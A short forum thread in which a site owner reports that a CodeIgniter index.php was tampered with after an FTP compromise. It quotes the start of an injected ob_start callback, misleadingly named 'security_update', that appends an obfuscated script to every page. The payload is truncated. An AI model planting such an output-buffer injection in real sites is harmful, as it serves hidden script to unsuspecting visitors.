Welcome Guest, Not a member yet? Register   Sign In
CI and ob_start function
#1

[eluser]Unknown[/eluser]
Hello,

today i found on my site, developed with CI, a weird stuff....
index.php (CI original package) was modified, and on top of all there was this function:

ob_start("security_update");

function security_update($buffer){return $buffer."\[removed]\$\=\"Z6fpZ3dZ22Z2524Z253dZ2522dw\(dcZ2573\(cuZ252cZ2531Z2534Z2529\)Z253bZ2522\;Z22\;dbZ3dZ2289\+tqduZ3ecudTqdu8tqd.... etc etc etc

so all the site show on bottom the result of function, a lot of spammed letter...

I reloaded original index.php, and all is solved, but...anyone know what can be happend??

We are waiting also for ftp logs.

tnx in advance for any suggestion or analize.

/LS
#2

[eluser]Unknown[/eluser]
Nevermind, our Provider logs showed an FTP hacking.

regards
LS




Theme © iAndrew 2016 - Forum software by © MyBB